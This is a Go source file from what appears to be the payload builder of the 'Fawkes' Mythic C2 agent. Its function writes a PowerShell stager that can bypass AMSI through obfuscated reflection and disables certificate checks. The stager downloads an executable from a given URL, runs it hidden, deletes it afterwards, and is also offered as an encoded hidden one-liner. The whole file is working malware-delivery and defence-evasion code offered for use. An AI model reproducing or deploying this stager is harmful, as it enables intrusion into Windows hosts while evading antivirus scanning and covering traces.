package agentfunctions

import (
	"encoding/base64"
	"fmt"
	"strings"

	agentstructs "github.com/MythicMeta/MythicContainer/agent_structs"
	"github.com/MythicMeta/MythicContainer/mythicrpc"
)

// buildPowerShellStager generates a PowerShell download cradle that fetches and
// executes the full Fawkes agent. No Go compilation needed — output is a .ps1 file.
func buildPowerShellStager(msg agentstructs.PayloadBuildMessage, resp *agentstructs.PayloadBuildResponse) agentstructs.PayloadBuildResponse {
	stagerURL, _ := msg.BuildParameters.GetStringArg("stager_url")
	if stagerURL == "" {
		resp.Success = false
		resp.BuildStdErr = "stager_url is required for windows-ps-stager mode"
		return *resp
	}

	amsiBypass, _ := msg.BuildParameters.GetBooleanArg("stager_amsi_bypass")

	var ps strings.Builder

	// Header comment
	ps.WriteString("# Fawkes PowerShell Stager\n")
	ps.WriteString("# Generated by Mythic agent builder\n")
	ps.WriteString(fmt.Sprintf("# Payload UUID: %s\n", msg.PayloadUUID))
	ps.WriteString("$ErrorActionPreference='SilentlyContinue'\n\n")

	// Optional AMSI bypass
	if amsiBypass {
		ps.WriteString("# AMSI Bypass - patch AmsiScanBuffer to return AMSI_RESULT_CLEAN\n")
		ps.WriteString("try{\n")
		ps.WriteString("  $w=[Ref].Assembly.GetType('System.Management.Automation.'+[char]65+'msi'+[char]85+'tils')\n")
		ps.WriteString("  $f=$w.GetField((''+[char]97+'msi'+'Init'+'Fai'+'led'),'NonPublic,Static')\n")
		ps.WriteString("  $f.SetValue($null,$true)\n")
		ps.WriteString("}catch{}\n\n")
	}

	// Download and execute
	ps.WriteString("# Download payload\n")
	ps.WriteString(fmt.Sprintf("$u='%s'\n", stagerURL))
	ps.WriteString("$wc=New-Object System.Net.WebClient\n")
	ps.WriteString("[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}\n")
	ps.WriteString("$p=$env:TEMP+'\\'+[System.IO.Path]::GetRandomFileName()+'.exe'\n")
	ps.WriteString("try{\n")
	ps.WriteString("  $wc.DownloadFile($u,$p)\n")
	ps.WriteString("  # Execute detached\n")
	ps.WriteString("  Start-Process -FilePath $p -WindowStyle Hidden\n")
	ps.WriteString("  Start-Sleep -Seconds 2\n")
	ps.WriteString("  # Self-cleanup: schedule deletion\n")
	ps.WriteString("  $cmd=\"cmd /c ping 127.0.0.1 -n 5 >nul & del `\"$p`\"\"\n")
	ps.WriteString("  Start-Process -FilePath 'cmd.exe' -ArgumentList \"/c $cmd\" -WindowStyle Hidden\n")
	ps.WriteString("}catch{\n")
	ps.WriteString("  Write-Host $_.Exception.Message\n")
	ps.WriteString("}\n")

	stagerBytes := []byte(ps.String())

	// Also generate a one-liner version as build output
	oneLiner := fmt.Sprintf("powershell -nop -w hidden -enc %s", base64.StdEncoding.EncodeToString(
		[]byte(encodeUTF16LE(ps.String())),
	))

	mythicrpc.SendMythicRPCPayloadUpdateBuildStep(mythicrpc.MythicRPCPayloadUpdateBuildStepMessage{
		PayloadUUID: msg.PayloadUUID,
		StepName:    "Generate Stager",
		StepSuccess: true,
		StepStdout: fmt.Sprintf("PowerShell stager generated\n"+
			"Download URL: %s\n"+
			"AMSI bypass: %v\n"+
			"Stager size: %d bytes\n\n"+
			"One-liner:\n%s",
			stagerURL, amsiBypass, len(stagerBytes), oneLiner),
	})

	resp.Payload = &stagerBytes
	resp.Success = true
	resp.BuildMessage = "PowerShell stager generated successfully!"
	filename := "fawkes_stager.ps1"
	resp.UpdatedFilename = &filename
	return *resp
}

// encodeUTF16LE converts a string to UTF-16LE byte sequence for PowerShell -enc
func encodeUTF16LE(s string) string {
	result := make([]byte, 0, len(s)*2)
	for _, r := range s {
		result = append(result, byte(r), byte(r>>8))
	}
	return string(result)
}
